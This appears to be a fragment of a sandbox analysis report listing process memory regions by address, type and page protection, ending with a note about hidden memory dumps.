heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
25EAC9F3000
heap
page read and write
22563185000
heap
page read and write
2256316D000
heap
page read and write
285059E7000
trusted library allocation
page read and write
210C3079000
heap
page read and write
210C12D9000
heap
page read and write
22564EF3000
heap
page read and write
2256595F000
heap
page read and write
7FFD9B740000
trusted library allocation
page execute and read and write
28505A30000
trusted library allocation
page read and write
22565090000
remote allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
25EAE7B6000
heap
page read and write
22564EB3000
heap
page read and write
245F2770000
trusted library allocation
page read and write
54AF3FF000
stack
page read and write
210C3090000
heap
page read and write
25EAC9E0000
heap
page read and write
22565D45000
heap
page read and write
7FFD9B670000
trusted library allocation
page execute and read and write
25EAC9EF000
heap
page read and write
22563085000
heap
page read and write
28503940000
heap
page read and write
285158E1000
trusted library allocation
page read and write
210C3126000
heap
page read and write
A2C4BFF000
stack
page read and write
22563020000
heap
page read and write
285059E1000
trusted library allocation
page read and write
22565CCE000
heap
page read and write
7FFD9B670000
trusted library allocation
page execute and read and write
225659C7000
heap
page read and write
897D7FE000
stack
page read and write
25EAC9EB000
heap
page read and write
22564E95000
heap
page read and write
22565CEE000
heap
page read and write
2458057F000
trusted library allocation
page read and write
25EAC9E0000
heap
page read and write
897D9BE000
stack
page read and write
22564E84000
heap
page read and write
22565D54000
heap
page read and write
210C30BC000
heap
page read and write
22565CD1000
heap
page read and write
F96BBBE000
stack
page read and write
1D400A01000
trusted library allocation
page read and write
2851DA52000
heap
page read and write
25EAE746000
heap
page read and write
25EAE741000
heap
page read and write
28505594000
heap
page read and write
285059F6000
trusted library allocation
page read and write
1D40A801000
trusted library allocation
page read and write
22565CCE000
heap
page read and write
210C12D1000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
225630CF000
heap
page read and write
22565958000
heap
page read and write
225658F7000
heap
page read and write
210C3112000
heap
page read and write
54AEEF9000
stack
page read and write
BCFCCFF000
stack
page read and write
210C3314000
heap
page read and write
F96BA7F000
stack
page read and write
BCFCEFE000
stack
page read and write
210C307F000
heap
page read and write
210C1220000
heap
page read and write
210C31D3000
heap
page read and write
2256598D000
heap
page read and write
2256592E000
heap
page read and write
54AF4FE000
stack
page read and write
2851DA10000
heap
page read and write
210C12D5000
heap
page read and write
7FFD9B6F2000
trusted library allocation
page read and write
2256598D000
heap
page read and write
245F4567000
heap
page read and write
285039C3000
heap
page read and write
DDBFA3F000
stack
page read and write
25EAC93A000
heap
page read and write
28503989000
heap
page read and write
245F4591000
heap
page read and write
BCFD3FC000
stack
page read and write
28505DA6000
trusted library allocation
page read and write
210C30C3000
heap
page read and write
22564F2B000
heap
page read and write
245F266C000
heap
page read and write
25EAE7FD000
heap
page read and write
245F44BB000
heap
page read and write
25EAE7E2000
heap
page read and write
285158F1000
trusted library allocation
page read and write
245F44B1000
heap
page read and write
25EAE773000
heap
page read and write
210C3171000
heap
page read and write
225659CB000
heap
page read and write
7FFD9B840000
trusted library allocation
page read and write
DDBF8B9000
stack
page read and write
25EAE93E000
heap
page read and write
2256316F000
heap
page read and write
2851DAAB000
heap
page read and write
897DD3E000
stack
page read and write
210C3154000
heap
page read and write
210C314E000
heap
page read and write
245F4501000
heap
page read and write
2850397C000
heap
page read and write
22565020000
heap
page read and write
7FFD9B750000
trusted library allocation
page read and write
DDBF4FF000
stack
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
22564E8D000
heap
page read and write
210C30A8000
heap
page read and write
2256316F000
heap
page read and write
25EAE7EE000
heap
page read and write
210C30B4000
heap
page read and write
210C30C0000
heap
page read and write
245F4490000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page read and write
210C312D000
heap
page read and write
225658E0000
heap
page read and write
210C30F6000
heap
page read and write
2851DC80000
heap
page read and write
210C3145000
heap
page read and write
22565BC2000
heap
page read and write
7FFD9B701000
trusted library allocation
page read and write
285039C8000
heap
page read and write
2458071E000
trusted library allocation
page read and write
DDBF1D2000
stack
page read and write
210C308B000
heap
page read and write
22564E9D000
heap
page read and write
2256316D000
heap
page read and write
22565CCE000
heap
page read and write
7FFD9B860000
trusted library allocation
page read and write
225630B8000
heap
page read and write
245F26B2000
heap
page read and write
245F25A0000
heap
page read and write
DDBF83E000
stack
page read and write
245F2810000
trusted library allocation
page read and write
245F2780000
heap
page execute and read and write
210C307F000
heap
page read and write
DDBF9B8000
stack
page read and write
210C3139000
heap
page read and write
210C326E000
heap
page read and write
28515956000
trusted library allocation
page read and write
25EAC94F000
heap
page read and write
2851DA50000
heap
page read and write
210C12A0000
heap
page read and write
897D77D000
stack
page read and write
22565BCE000
heap
page read and write
210C123D000
heap
page read and write
210C30A3000
heap
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
DDBFC3B000
stack
page read and write
7FFD9B7C0000
trusted library allocation
page read and write
22565D0F000
heap
page read and write
22565B8F000
heap
page read and write
225659B8000
heap
page read and write
210C30B7000
heap
page read and write
7FFD9B60C000
trusted library allocation
page execute and read and write
210C144D000
heap
page read and write
210C312A000
heap
page read and write
25EAC9F3000
heap
page read and write
22564ECE000
heap
page read and write
25EAC9DB000
heap
page read and write
BCFC5A4000
stack
page read and write
210C3097000
heap
page read and write
225658E2000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
25EAE93C000
heap
page read and write
25EAE750000
heap
page read and write
210C12DC000
heap
page read and write
7DF4C1260000
trusted library allocation
page execute and read and write
F96BEBE000
stack
page read and write
210C4F50000
trusted library allocation
page read and write
22565AD0000
heap
page read and write
210C31D3000
heap
page read and write
22564EDD000
heap
page read and write
210C12AD000
heap
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
225659B8000
heap
page read and write
22564EF5000
heap
page read and write
25EB02AA000
heap
page read and write
25EACA88000
heap
page read and write
210C4C00000
heap
page read and write
25EACA80000
heap
page read and write
210C12A0000
heap
page read and write
210C123A000
heap
page read and write
22565BCE000
heap
page read and write
25EAE93E000
heap
page read and write
25EAE767000
heap
page read and write
25EAE76B000
heap
page read and write
BCFC9FE000
stack
page read and write
1D400001000
trusted library allocation
page read and write
7FFD9B701000
trusted library allocation
page read and write
210C3145000
heap
page read and write
210C3086000
heap
page read and write
2851DA06000
heap
page execute and read and write
DDBFBBE000
stack
page read and write
7FFD9B800000
trusted library allocation
page read and write
22565090000
remote allocation
page read and write
897D6FE000
stack
page read and write
7FFD9B55D000
trusted library allocation
page execute and read and write
25EAE7B9000
heap
page read and write
24580060000
trusted library allocation
page read and write
25EAE841000
heap
page read and write
245F4572000
heap
page read and write
25EAC918000
heap
page read and write
210C1220000
heap
page read and write
A2C49FE000
stack
page read and write
BCFCFFB000
stack
page read and write
897DB3C000
stack
page read and write
210C3121000
heap
page read and write
2256316D000
heap
page read and write
25EAC9E6000
heap
page read and write
7FFD9B70A000
trusted library allocation
page read and write
28503910000
heap
page read and write
22564E9E000
heap
page read and write
245F2758000
heap
page read and write
22565D58000
heap
page read and write
25EAC830000
heap
page read and write
210C31D5000
heap
page read and write
22563185000
heap
page read and write
DDC060E000
stack
page read and write
25EAE812000
heap
page read and write
897DAB9000
stack
page read and write
225651C0000
heap
page read and write
DDBF6FE000
stack
page read and write
22563185000
heap
page read and write
245F2678000
heap
page read and write
22565D66000
heap
page read and write
225659B8000
heap
page read and write
7FFD9B636000
trusted library allocation
page execute and read and write
7FFD9B70A000
trusted library allocation
page read and write
225659C4000
heap
page read and write
F96B87E000
stack
page read and write
F96B7FE000
stack
page read and write
210C3315000
heap
page read and write
210C144A000
heap
page read and write
25EAE744000
heap
page read and write
245F2750000
heap
page read and write
25EAC9F3000
heap
page read and write
210C12A9000
heap
page read and write
2458012B000
trusted library allocation
page read and write
25EAE8A3000
heap
page read and write
22565BCE000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
2458047C000
trusted library allocation
page read and write
210C12CE000
heap
page read and write
2851DB10000
heap
page read and write
25EAE778000
heap
page read and write
210C12A9000
heap
page read and write
225658E7000
heap
page read and write
28505520000
heap
page execute and read and write
2851DCB7000
heap
page read and write
2851DA4E000
heap
page read and write
7FFD9B850000
trusted library allocation
page read and write
245F4AF0000
heap
page read and write
2850399D000
heap
page read and write
210C12C9000
heap
page read and write
25EAC9EB000
heap
page read and write
1D409E01000
trusted library allocation
page read and write
22564EAE000
heap
page read and write
25EAE7E5000
heap
page read and write
210C30FE000
heap
page read and write
25EAE93C000
heap
page read and write
22565CCE000
heap
page read and write
28503C54000
heap
page read and write
25EAC93A000
heap
page read and write
22565C71000
heap
page read and write
210C12DC000
heap
page read and write
7FFD9B560000
trusted library allocation
page read and write
25EAE756000
heap
page read and write
245F2756000
heap
page read and write
22565CB4000
heap
page read and write
25EAC910000
heap
page read and write
2458012E000
trusted library allocation
page read and write
210C123E000
heap
page read and write
25EAC940000
heap
page read and write
25EAC93A000
heap
page read and write
F96B9FF000
stack
page read and write
22564EF3000
heap
page read and write
225658FC000
heap
page read and write
25EAC9DF000
heap
page read and write
22564EF3000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
22564EA6000
heap
page read and write
7FFD9B606000
trusted library allocation
page read and write
25EAE7A1000
heap
page read and write
22564EF3000
heap
page read and write
210C12CD000
heap
page read and write
22564E81000
heap
page read and write
7FFD9B56B000
trusted library allocation
page read and write
F96BB3F000
stack
page read and write
25EAE7CE000
heap
page read and write
25EAE7F6000
heap
page read and write
22564E85000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
25EAE767000
heap
page read and write
1D40B201000
trusted library allocation
page read and write
25EAE7D1000
heap
page read and write
28503C5E000
heap
page read and write
22565CD4000
heap
page read and write
7FFD9B610000
trusted library allocation
page execute and read and write
225658FC000
heap
page read and write
25EAC9F3000
heap
page read and write
BCFD1FE000
stack
page read and write
210C121B000
heap
page read and write
25EAE940000
heap
page read and write
25EACA89000
heap
page read and write
25EAE7FA000
heap
page read and write
897E80D000
stack
page read and write
245F2650000
heap
page read and write
2459000F000
trusted library allocation
page read and write
25EACA8E000
heap
page read and write
897DCBE000
stack
page read and write
25EAE93E000
heap
page read and write
245803E8000
trusted library allocation
page read and write
22565CFA000
heap
page read and write
210C3094000
heap
page read and write
22564E9D000
heap
page read and write
225659C5000
heap
page read and write
2256594B000
heap
page read and write
25EAC9DC000
heap
page read and write
28503C50000
heap
page read and write
210C310A000
heap
page read and write
22564EF3000
heap
page read and write
897DA38000
stack
page read and write
25EACA8D000
heap
page read and write
24580434000
trusted library allocation
page read and write
22565B36000
heap
page read and write
25EAC94D000
heap
page read and write
28505D82000
trusted library allocation
page read and write
25EAC939000
heap
page read and write
210C123B000
heap
page read and write
210C311E000
heap
page read and write
28505D3B000
trusted library allocation
page read and write
BCFC8FE000
stack
page read and write
22565380000
heap
page read and write
245F26D4000
heap
page read and write
210C3097000
heap
page read and write
22564ECB000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
25EAC9B2000
heap
page read and write
25EAE7F1000
heap
page read and write
210C315B000
heap
page read and write
7FFD9B870000
trusted library allocation
page read and write
285038B0000
heap
page read and write
22565C34000
heap
page read and write
25EB02A9000
heap
page read and write
54AF2FE000
stack
page read and write
210C12A9000
heap
page read and write
25EAE824000
heap
page read and write
285059F9000
trusted library allocation
page read and write
1D408A01000
trusted library allocation
page read and write
210C4C07000
heap
page read and write
225630B9000
heap
page read and write
28505DDC000
trusted library allocation
page read and write
210C3097000
heap
page read and write
225650E5000
heap
page read and write
210C3080000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
25EAE7B1000
heap
page read and write
285038A0000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
210C30AF000
heap
page read and write
25EAC9C2000
heap
page read and write
22564E92000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
25EAE82B000
heap
page read and write
210C326C000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page read and write
22563080000
heap
page read and write
25EAC940000
heap
page read and write
F96B97E000
stack
page read and write
28505540000
heap
page read and write
1D408001000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
22565CEA000
heap
page read and write
22565AE6000
heap
page read and write
225659B8000
heap
page read and write
25EAE767000
heap
page read and write
225658EB000
heap
page read and write
25EB05D0000
trusted library allocation
page read and write
2256316F000
heap
page read and write
BCFD0FE000
stack
page read and write
210C122D000
heap
page read and write
1D409401000
trusted library allocation
page read and write
24580051000
trusted library allocation
page read and write
A2C4519000
stack
page read and write
24590076000
trusted library allocation
page read and write
28505D60000
trusted library allocation
page read and write
210C3090000
heap
page read and write
22564EF3000
heap
page read and write
7FFD9B870000
trusted library allocation
page read and write
DDBF67E000
stack
page read and write
285058E1000
trusted library allocation
page read and write
54AF0FE000
stack
page read and write
25EACA88000
heap
page read and write
210C1235000
heap
page read and write
25EAC9F3000
heap
page read and write
210C1208000
heap
page read and write
25EAE790000
heap
page read and write
245F44E5000
heap
page read and write
2851DA00000
heap
page execute and read and write
25EAC9E1000
heap
page read and write
7FFD9B554000
trusted library allocation
page read and write
210C12DC000
heap
page read and write
225659C5000
heap
page read and write
897E78E000
stack
page read and write
210C11C0000
heap
page read and write
25EAE9E4000
heap
page read and write
25EAE767000
heap
page read and write
897D979000
stack
page read and write
25EAC9E3000
heap
page read and write
2458006A000
trusted library allocation
page read and write
7FFD9B600000
trusted library allocation
page read and write
245F44A0000
heap
page read and write
210C1449000
heap
page read and write
7FFD9B7E0000
trusted library allocation
page read and write
25EAC93F000
heap
page read and write
210C11E0000
heap
page read and write
22564ED8000
heap
page read and write
897DBBE000
stack
page read and write
245805CC000
trusted library allocation
page read and write
22564EC3000
heap
page read and write
22564E82000
heap
page read and write
22564E92000
heap
page read and write
2256316D000
heap
page read and write
25EAC94B000
heap
page read and write
210C12D6000
heap
page read and write
28503B60000
trusted library allocation
page read and write
28505590000
heap
page read and write
245805BF000
trusted library allocation
page read and write
22564E86000
heap
page read and write
897D3DE000
stack
page read and write
245F2836000
heap
page execute and read and write
210C122E000
heap
page read and write
225659C0000
heap
page read and write
245F25C0000
heap
page read and write
22564E82000
heap
page read and write
24580131000
trusted library allocation
page read and write
25EAE75B000
heap
page read and write
210C3071000
heap
page read and write
22563090000
heap
page read and write
25EAE809000
heap
page read and write
25EAE76C000
heap
page read and write
25EAC9E3000
heap
page read and write
7FFD9B820000
trusted library allocation
page read and write
210C3071000
heap
page read and write
245F456D000
heap
page read and write
22565BCE000
heap
page read and write
210C12DC000
heap
page read and write
22565D45000
heap
page read and write
24580554000
trusted library allocation
page read and write
22564E86000
heap
page read and write
22563098000
heap
page read and write
210C1448000
heap
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
285059DE000
trusted library allocation
page read and write
A2C4CFE000
stack
page read and write
22565CDB000
heap
page read and write
225650E0000
heap
page read and write
1D401E01000
trusted library allocation
page read and write
245F44EE000
heap
page read and write
22564E8A000
heap
page read and write
210C3090000
heap
page read and write
25EAE764000
heap
page read and write
245F266E000
heap
page read and write
25EAE82F000
heap
page read and write
2256598D000
heap
page read and write
245F2790000
heap
page readonly
7FFD9B553000
trusted library allocation
page execute and read and write
DDBF57E000
stack
page read and write
22563000000
heap
page read and write
210C326C000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
210C3077000
heap
page read and write
25EAC9D9000
heap
page read and write
22565AD1000
heap
page read and write
210C4E00000
heap
page read and write
210C12D3000
heap
page read and write
210C315F000
heap
page read and write
25EAE760000
heap
page read and write
7FFD9B553000
trusted library allocation
page execute and read and write
25EAE81E000
heap
page read and write
7FFD9B720000
trusted library allocation
page execute and read and write
7FFD9B760000
trusted library allocation
page read and write
210C308B000
heap
page read and write
210C12B6000
heap
page read and write
BCFCBFF000
stack
page read and write
F96B673000
stack
page read and write
7FFD9B860000
trusted library allocation
page read and write
22565D61000
heap
page read and write
210C3097000
heap
page read and write
22564EBB000
heap
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
25EAC9F3000
heap
page read and write
2256598D000
heap
page read and write
22563126000
heap
page read and write
245F46B2000
heap
page read and write
245F2600000
heap
page read and write
F96BF3B000
stack
page read and write
245F456B000
heap
page read and write
210C3136000
heap
page read and write
24580617000
trusted library allocation
page read and write
245F2880000
heap
page read and write
25EAE78C000
heap
page read and write
7FFD9B732000
trusted library allocation
page read and write
25EAE754000
heap
page read and write
25EAE787000
heap
page read and write
25EAC940000
heap
page read and write
28503948000
heap
page read and write
285039C5000
heap
page read and write
28503BA0000
heap
page execute and read and write
28505969000
trusted library allocation
page read and write
22565BF9000
heap
page read and write
25EAE749000
heap
page read and write
22564EB6000
heap
page read and write
25EACA10000
heap
page read and write
2458016B000
trusted library allocation
page read and write
210C12CF000
heap
page read and write
897DC3E000
stack
page read and write
2458001F000
trusted library allocation
page read and write
25EAE806000
heap
page read and write
25EAC9BD000
heap
page read and write
22565D52000
heap
page read and write
25EAE74F000
heap
page read and write
22565CFC000
heap
page read and write
210C3097000
heap
page read and write
24580117000
trusted library allocation
page read and write
25EAC930000
heap
page read and write
2851DA4B000
heap
page read and write
22564E8E000
heap
page read and write
25EAC9B2000
heap
page read and write
22565B0D000
heap
page read and write
25EB02A0000
heap
page read and write
210C30E1000
heap
page read and write
7FFD9B636000
trusted library allocation
page execute and read and write
225659BA000
heap
page read and write
22563100000
heap
page read and write
210C314F000
heap
page read and write
210C30E9000
heap
page read and write
25EAE793000
heap
page read and write
DDBF7F8000
stack
page read and write
1D40BC01000
trusted library allocation
page read and write
1D403C01000
trusted library allocation
page read and write
2851DC97000
heap
page read and write
210C12B1000
heap
page read and write
54AEFFE000
stack
page read and write
A2C4DFE000
stack
page read and write
28503965000
heap
page read and write
22565250000
heap
page read and write
22565D07000
heap
page read and write
22565CD0000
heap
page read and write
25EAE3F4000
heap
page read and write
22564ECE000
heap
page read and write
2256594B000
heap
page read and write
22564ED7000
heap
page read and write
897E88B000
stack
page read and write
28505A38000
trusted library allocation
page read and write
210C3070000
heap
page read and write
F96B8FC000
stack
page read and write
A2C4EFF000
stack
page read and write
245F4690000
heap
page read and write
24580094000
trusted library allocation
page read and write
245F47AB000
heap
page read and write
25EAC9EB000
heap
page read and write
22565CDB000
heap
page read and write
25EACA30000
heap
page read and write
210C326E000
heap
page read and write
7FFD9B60C000
trusted library allocation
page execute and read and write
210C307C000
heap
page read and write
7FFD9B732000
trusted library allocation
page read and write
25EAE826000
heap
page read and write
22564E9D000
heap
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
There are 774 hidden memdumps, click here to show them.